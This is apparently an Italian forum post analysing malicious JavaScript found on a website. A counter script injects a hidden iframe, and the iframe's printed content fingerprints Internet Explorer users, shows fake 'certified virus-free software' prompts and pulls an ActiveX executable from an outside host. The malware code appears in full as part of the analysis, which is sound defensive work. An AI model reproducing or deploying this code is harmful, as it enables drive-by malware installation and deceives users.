Finalfire
Ho notato che nel caricare quel sito si passa proprio attraverso questo nodo. Mi sembra strano che non te lo dia, dato che ho provato anch'io col traceroute per confermare ed effettivamente lo trova (lo catto su un file appena riesco a riaccedere <.<). Piu' che altro, non credo riguardi ne il DNS ne l'host stesso.
Il sito chiama http://stat.statistiche.ws/counter.php?user=20524, dove c'è uno script che tra le altre cose genera un iframe.
Codice:
if ( parseInt(pr17) <= parseInt("3") ) {
document.write('<div style="position:absolute; left: -5000px; top: -5000px;visibility:hidden;">');
document.write('<if'+'rame frameborder="0" src="http://7vw.b5srdc.gondar-my.net/htm/cc1.php?p=55&cc2=IT"><'+'/iframe>' );
document.write('</div>');
};
Accedendo direttamente all'src dell'iframe non viene caricato niente, però osservando la pagina con il dom inspector si nota che l'iframe ha questo contenuto:
Codice:
if(window.parent == window) location.replace("cc1.php.htm?p=55");//it;
window.onerror = errorwindow;
function errorwindow(){return true; };
var msie = 1;
var sp2 = 0 ;
var win = 1 ;
var x_check_Z = "";
var x_check_Z1 = "";
var pop_block ;
var nav = navigator.userAgent.toLowerCase() ;
var disclaimer;
var date = new Date();
var cc = 0;
var ccmax=5;
if (navigator.userLanguage) {
var lan = navigator.userLanguage.toLowerCase() }
else {var lan = navigator.language.toLowerCase()
};
if (!document.all) msie =0;
if(nav) {
if(!nav.match(/;-/) && !nav.match(/\(-/) ) {
if(!(nav.match(/win/))) {win=0}
else if (nav.match(/sv1/) || nav.match(/msie 7/) ){sp2 = 1};
}
}
else {win = 0;msie=0
};
function insert(html) {
if(msie==0) {
document.body.innerHTML += html;
} else {
document.body.insertAdjacentHTML("BeforeEnd",html)
}
}
function ErrorActiveX() {
if (cc < ccmax ) {
cc ++;
document.body.insertAdjacentHTML("BeforeEnd",x_check_Z)
} else {
cc = 0;
if (confirm(disclaimer)) {document.body.insertAdjacentHTML("BeforeEnd",x_check_Z) }
else {setTimeout('document.body.insertAdjacentHTML("BeforeEnd",x_check_Z)',50000)};
};
};
if (msie==1) {var wparam = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=0,height=0,top=50000,left=50000" }
else {var wparam = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=150,height=160,top=5000,left=5000"};
function go_adsl() {
if (win==1 && msie==1) {
var iframe_s = '<if' + 'rame src="/htm/winscript-51.htm?' + Date.parse(date) + '">' + '<' + '/iframe>';
insert(iframe_s);window.focus();
} else {
};
};
function go_dialup() {
if (sp2==1 ) {
var iframe_s = '<if' + 'rame src="/htm/winscript-11.htm?' + Date.parse(date) + '">' + '<' + '/iframe>';
insert(iframe_s);window.focus();
} else if (win==1 && msie==1) {
if(lan && lan.toLowerCase().match(/it/) ) {
disclaimer = "\nNel tuo pc non e\' installato il software di accesso.\n\nPer visualizzare il sito devi installare correttamente questo software garantito contro ogni virus!\n\nClicca su SI nell'avviso di protezione\n\n\nTi ricordiamo che il software e\' GARANTITO e CERTIFICATO!\n\n\nVuoi visitare il sito in assoluta sicurezza ?\n";
}
else {
disclaimer = "\nYou have to install the connection software to visit this site.\n\nIt is tested 100% virus free\n\nDo you wanto to proceed ?";
};
x_check_Z = ')" id="A" CLASSID="CLSID:DB893839-10F0-4AF9-92FA-B23528F530AF" codebase="http://deposito.instantdoor.com/11769-23.exe"></object>';
x_check_Z = '<object onerror="ErrorActiveX(' + x_check_Z ;
insert(x_check_Z);
x_check_Z1 = 'DB893839-10F0-4AF9-92FA-B23528F530AF" codebase="http://deposito.instantdoor.com/11769-23.exe"></object>';
x_check_Z1 = '<object id="A" CLASSID="CLSID:' + x_check_Z1 ;
var aA1=window.open('/pop/win.php?vas=11769-23&ccmax=3&cs=0&rp=10000','my1',wparam);
var aA2=window.open('/pop/win.php?vas=11769-23&rt=20000&ccmax=3&cs=8805&rp=60000','my2',wparam);
var aA3=window.open('/pop/win.php?vas=11769-23&rt=25000&ccmax=3&cs=8805&rp=150000','my3',wparam);
if(!aA3 ) setTimeout("insert(x_check_Z1)",12000);
var aA4=window.open('/pop/win.php?vas=11769-23&rt=30000&ccmax=3&cs=8805&rp=220000','my4',wparam);
var iframe_s = '<if' + 'rame src="/htm/winscript-51.htm?' + Date.parse(date) + '">' + '<' + '/iframe>';
insert(iframe_s);window.focus();
} else {
};
}
function test_img() {
IMG_TESTaZ = new Image();
IMG_TESTaZ.src = "/adsl.jpg?" + Date.parse(date);
setTimeout('if(IMG_TESTaZ.complete) {go_adsl() } else {go_dialup() }', 1000 );
}
function test_m() {
if (document.body && document.body.addBehavior ){
document.body.addBehavior("#default#clientCaps");
if(document.body.connectionType && document.body.connectionType == "modem") {
go_dialup();
} else {
go_adsl();
};
} else {
test_img();
};
};
if (!(sp2==1 && 11==0) && !( win==0 && 2==0) ) {
test_m();
};
La prima riga spiega perchè lo script non sia accessibile direttamente, il resto si spiega da solo